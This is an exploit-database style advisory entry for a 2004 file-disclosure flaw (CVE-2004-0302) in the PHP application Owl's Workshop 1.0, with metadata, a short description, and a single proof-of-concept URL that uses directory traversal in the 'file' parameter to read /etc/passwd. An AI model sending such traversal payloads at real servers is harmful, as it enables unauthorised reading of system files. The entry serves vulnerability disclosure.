Fool's Workshop Owl's Workshop 1.0 - 'multiplechoice/index.php' Arbitrary File Access
Author: G00db0y
type: webapps
platform: php
port:
date_added: 2004-02-18
date_updated: 2012-12-28
verified: 1
codes: CVE-2004-0302;OSVDB-4003
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/9689/info
Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter.
Upon successful exploitation of these issues, an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.
http://www.example.org/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print